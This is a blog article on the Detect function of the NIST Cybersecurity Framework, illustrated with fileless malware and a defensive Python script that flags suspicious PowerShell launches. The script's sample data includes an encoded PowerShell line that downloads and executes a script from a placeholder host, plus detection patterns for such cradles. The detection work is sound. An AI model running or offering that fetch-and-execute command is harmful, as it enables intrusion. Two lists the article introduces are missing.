Enterprise chief information security officers have their work cut out for them in the current threat landscape. As attack and infection strategies become more complex and difficult to predict, the business’s CISO must ensure that the organization’s most critical information assets and the systems that support them are secure.
In order to create more cohesive and universal standards of protection, the National Institute of Standards and Technology established its Framework for Improving Critical Infrastructure Cybersecurity. This framework includes five key functions and associated categories for CISOs and their stakeholders to follow.
In Part 1 and Part 2 of this series, we examined the first function, Identify, and the second, Protect. Today, we’ll take a closer look at Detect, the third function in the framework, and at the responsibilities CISOs have under this step of the NIST Cybersecurity Framework.
Detect: NIST definition
The first two functions of the framework encompass establishing adequate understanding of the current infrastructure as well as the risks that can impact these systems. From here, CISOs should put the necessary protections in place to support the continuous delivery of critical services.
As Compass IT Compliance contributor Geoff Yeagley noted, the Identify function can be thought of as the foundation, with the Protect function serving as the framing.
“Once you have your house built, you need to put some items in your house to alert you to any pending danger or threats,” Yeagley wrote. “These could be things like smoke detectors, carbon monoxide detectors and home alarm systems. Using that same analogy of building a house, this would be the Detect function of the core.”
NIST defines the Detect function as the development and implementation of activities “to identify the occurrence of a cybersecurity event,” with a focus on supporting the timely discovery of such events.
Categories under Detect
As Yeagley and other experts note, this function is relatively straightforward. That does not make it any less important than the other functions of the framework, but it does include fewer associated categories. Let’s take a look:
It’s important to keep in mind that the goal is not only to detect the kind of suspicious activity that could point to an infection or attack, but to do so in a timely manner. Currently, hackers are able to fly under the radar for over 100 days before being detected, with some events lasting over 400 days. This gives attackers plenty of time to infect siloed areas of the business and make off with stolen data assets. For this reason, it’s imperative that CISOs give the Detect function, and its focus on timeliness, the appropriate attention and effort.
Detection in the real world: Fileless malware
In today’s threat environment, the ability to quickly detect suspicious activity is absolutely key. A recent example that shows this critical importance comes in the form of fileless malware, which has been put to work in ransomware and a range of other types of attacks.
Trend Micro reported on fileless malware in 2017, explaining that, like other attacks, fileless malware looks to take advantage of system vulnerabilities, but is built with an additional express purpose: to operate in the background and remain undetectable to system security measures. This lets attackers prolong the intrusion and potentially reach and steal from increasingly sensitive platforms and data assets.
“Current security solutions detect an intrusion based on a malware file’s signature characteristics,” Trend Micro stated in its Simply Security blog. “However, because fileless malware doesn’t have a payload file to infect a system, security applications don’t know what to look for. In addition, this threat uses a system’s own commands to execute the attack, which might not be considered in traffic and behavior monitoring efforts.”
One of the most notable campaigns leveraging fileless malware impacted more than 100 banks and financial service providers across the globe – in one instance, the infection was only discovered when a bank’s security team investigated the physical memory of their Microsoft domain controller. In addition to internal banking systems, hackers also unleashed the fileless malware attack on eight Russian ATMs, allowing attackers to take control of the machines’ capabilities and steal more than $800,000.
Detection lessons of fileless malware
One of the biggest lessons of fileless malware is that an attack no longer requires a malicious file written to or downloaded onto the local disk to execute a payload – attackers can instead target system memory or the registry, injecting the payload there, or run scripts inside a whitelisted application. In the latter case, attackers exploit the legitimacy of tools like PowerShell, built on the .NET Framework, because of its scope, its accessibility and its ability to reach a wide range of APIs.
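As an added example (not code from the original article or from Trend Micro), the following Python triage script illustrates the kind of detection this lesson calls for: it inspects constructed Windows process-creation records, expands PowerShell's -EncodedCommand argument so the rules see the decoded script rather than a base64 blob, and flags stacked indicators such as a hidden window, an encoded command, Invoke-Expression combined with a download cradle, and an Office parent process. The event field names, the rule names and thresholds, and every sample value (PIDs, paths, host name) are assumptions made for this example.

```python
import base64
import re

# Constructed sample: a decoded PowerShell one-liner of the "fetch a script and
# run it in memory" kind that the article's fileless-malware discussion refers
# to. The host uses the reserved .invalid TLD and exists only to drive the rules.
DECODED_SAMPLE = ("IEX (New-Object Net.WebClient)"
                  ".DownloadString('http://example.invalid/stage.ps1')")
# PowerShell expects -EncodedCommand to carry base64 of the UTF-16LE script.
_ENCODED_SAMPLE = base64.b64encode(DECODED_SAMPLE.encode("utf-16-le")).decode("ascii")

# Constructed process-creation records, loosely shaped like Sysmon Event ID 1 /
# Windows 4688 fields. PIDs, paths and command lines are made up for this example.
SAMPLE_EVENTS = [
    {"pid": 4312, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Reports"},
    {"pid": 5120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "powershell.exe -NoP -W Hidden -EncodedCommand " + _ENCODED_SAMPLE},
    {"pid": 6001, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"pid": 6120, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"notepad.exe C:\Reports\todo.txt"},
]

POWERSHELL_IMAGES = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# -EncodedCommand and its documented short forms, followed by the base64 argument.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# (rule name, pattern) pairs applied to the command line after base64 expansion.
# These are commonly documented PowerShell abuse indicators, chosen for this example.
RULES = [
    ("encoded_command", re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s")),
    ("hidden_window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("bypass_execution_policy", re.compile(r"(?i)-ex(?:ecutionpolicy)?\s+bypass")),
    ("invoke_expression", re.compile(r"(?i)\b(?:iex|invoke-expression)\b")),
    ("download_cradle", re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient")),
]


def _basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def expand_encoded_command(command_line):
    """Replace a -EncodedCommand base64 argument with its decoded UTF-16LE script,
    so the detection rules inspect what PowerShell would actually run. A
    malformed blob is left untouched; the encoded_command rule still fires on it."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return command_line
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return command_line
    return command_line[:m.start(1)] + decoded + command_line[m.end(1):]


def analyze_event(event):
    """Return the names of the rules that fire for one process-creation event
    (empty list for non-PowerShell processes and for ordinary PowerShell use)."""
    if _basename(event["image"]) not in POWERSHELL_IMAGES:
        return []
    text = expand_encoded_command(event["command_line"])
    reasons = [name for name, rx in RULES if rx.search(text)]
    if _basename(event["parent_image"]) in OFFICE_PARENTS:
        reasons.append("office_parent")
    return reasons


def triage(events, min_hits=2):
    """Return (pid, reasons) for events with at least min_hits indicators. A lone
    hit such as -ExecutionPolicy Bypass is common in legitimate automation, so the
    threshold keeps the alert queue focused while still surfacing stacked indicators."""
    flagged = []
    for ev in events:
        reasons = analyze_event(ev)
        if len(reasons) >= min_hits:
            flagged.append((ev["pid"], reasons))
    return flagged


if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS):
        print(f"pid {pid}: {', '.join(reasons)}")
```

Run as-is, only the Word-spawned, encoded, hidden-window PowerShell process (pid 5120) is reported; the administrator's Get-ChildItem call and the scheduled backup script each fall below the threshold. The point the example makes for the Detect function is that signature matching on a dropped file would see nothing here, whereas process-creation telemetry with command-line and parent-process context surfaces the activity in seconds rather than the 100-plus-day dwell times described above.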
CISOs: Leverage a proactive Detect strategy
Guarding against advanced threats like fileless malware is difficult but not impossible – it does, however, require a proactive approach that is used alongside, and aligned with, the standards of the Detect function. As Trend Micro Researcher Marvin Cruz noted, proactive security should include measures like:
“We are in a global cyber arms race,” said Ed Cabrera, Trend Micro Chief Cybersecurity Officer. “The explosive growth of criminal innovation and automation requires an in-kind response from CISOs and their teams. Speeding up quality detection through a layered connected threat defense is paramount.”
Through the intelligent identification of risks, implementation of security measures to ensure critical functions and timely detection of threats, enterprises can considerably improve protections of their most critical IT assets. But efforts shouldn’t stop here – check in later for the next parts of our series, where we’ll discuss the Respond and Recover functions.